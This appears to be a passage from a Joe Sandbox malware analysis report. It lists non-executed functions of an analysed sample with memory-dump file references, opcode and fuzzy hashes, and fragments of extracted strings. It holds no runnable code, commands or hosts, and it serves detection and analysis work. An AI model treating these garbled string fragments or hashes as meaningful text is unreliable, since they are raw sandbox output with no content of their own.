                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: c6971ba0a85e16b50440a941023e782103e6f85e84001d670ba7fa3adb5830d2
                                                                                          • Instruction ID: 48bb4216f7d500d9db531adab3a224e90b9081716a9165826b2060abfb62b8d3
                                                                                          • Opcode Fuzzy Hash: c6971ba0a85e16b50440a941023e782103e6f85e84001d670ba7fa3adb5830d2
                                                                                          • Instruction Fuzzy Hash: EBF074701083418FE320EF15C15870ABBE4BFC5304F11891CE4988B291CBB595488F83

                                                                                          Non-executed Functions

                                                                                          Function 004AA523 Relevance: 72.9, Strings: 58, Instructions: 377COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ($+$-$/$0$1$2$3$4$8$8$9$9$;$<$=$>$?$?$@$A$B$C$E$G$H$I$K$M$O$Q$S$S$U$W$Y$[$\$]$_$a$c$e$g$i$k$m$o$q$s$u$w$x$y${$|$|$}
                                                                                          • API String ID: 0-901420310
                                                                                          • Opcode ID: f6c2d255fbf562c9fe7537ca20b144c0394eb154a58bd892bf773235e869bdf3
                                                                                          • Instruction ID: 87893eee26e1cc2c25f75ce585a84271741d1b0b36ba0d64c640fc5dfe70848e
                                                                                          • Opcode Fuzzy Hash: f6c2d255fbf562c9fe7537ca20b144c0394eb154a58bd892bf773235e869bdf3
                                                                                          • Instruction Fuzzy Hash: 492231219087E98DDB32C67C8C487DDBEA15B67324F0843D9D1E96B2D2C3B50B85CB66
                                                                                          Function 004A9F61 Relevance: 44.0, Strings: 35, Instructions: 288COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !$#$$$%$'$)$+$-$/$0$1$3$4$5$7$9$;$<$=$>$?$@$A$E$E$G$H$M$X$Y$[$h$r$s$t
                                                                                          • API String ID: 0-3672740722
                                                                                          • Opcode ID: 17e3c8e93f7620fe6ba21d93112768e57a31f822a819bbddac78e81d67dfd030
                                                                                          • Instruction ID: 584e3c890854bc230a50586232257224613fdf4a5e857ce3dbfd63c9705b4f4b
                                                                                          • Opcode Fuzzy Hash: 17e3c8e93f7620fe6ba21d93112768e57a31f822a819bbddac78e81d67dfd030
                                                                                          • Instruction Fuzzy Hash: 94E19421D086E98EDB22CA7C88043DDBFB15B63314F1842DDD4E9AB3D2C7794A45CB56
                                                                                          Function 004983E2 Relevance: 23.2, Strings: 18, Instructions: 687COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: G"A$&+$*$/E;C$/$$2A"_$@C$O\$SX$_Y$h#j=$i'd!$lF$m9O7$pq$pq$r3$31
                                                                                          • API String ID: 0-1158987392
                                                                                          • Opcode ID: d6f4684e4ff2d40999717de5456ef6074d76474ae34d32b0898c0b78fec391e5
                                                                                          • Instruction ID: 324797201778d1949ef9a31adeef393bc0e06b99eea1260be55d07f3c96e2186
                                                                                          • Opcode Fuzzy Hash: d6f4684e4ff2d40999717de5456ef6074d76474ae34d32b0898c0b78fec391e5
                                                                                          • Instruction Fuzzy Hash: 34721CB41083858BE334CF25D881B9FBBE1FB96304F10892DE6D99B251EB749146CF96
                                                                                          Function 00471000 Relevance: 19.5, Strings: 14, Instructions: 1998COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
                                                                                          • API String ID: 0-3131871939
                                                                                          • Opcode ID: b3002ac555fd4045b96c3bdd8a1902b5ac4800e177dfe01a4fbb748fd12a8052
                                                                                          • Instruction ID: b6af2505bffb2492008ea28c34d98f468ba73d19fa4dc019693df66fa38c4e4c
                                                                                          • Opcode Fuzzy Hash: b3002ac555fd4045b96c3bdd8a1902b5ac4800e177dfe01a4fbb748fd12a8052
                                                                                          • Instruction Fuzzy Hash: B6E207716083518FC718CF28C4943ABBBE2AF95314F18C66EE4998B391D378DD45DB8A
                                                                                          Function 0048FBA0 Relevance: 17.8, Strings: 13, Instructions: 1566COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &?3$,/.1$3210$4761$8;:5$8?$L$RdOh$X[Z]$dgfi$h$mdOh$w`k
                                                                                          • API String ID: 0-3944949542
                                                                                          • Opcode ID: 38eab78a967925801faf1db9e4f126c6c3faf7633c3a6bd056201facaf4d7696
                                                                                          • Instruction ID: 7fd0e072baea035290ee23cc241a0bc29d61be325b64be2915523b8a2b511e7a
                                                                                          • Opcode Fuzzy Hash: 38eab78a967925801faf1db9e4f126c6c3faf7633c3a6bd056201facaf4d7696
                                                                                          • Instruction Fuzzy Hash: 7FB2EF7150C3818FDB25CF25C4907ABBBE2AFD6304F18896EE4D98B391D7789805CB96
                                                                                          Function 004712D5 Relevance: 16.0, Strings: 12, Instructions: 1008COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
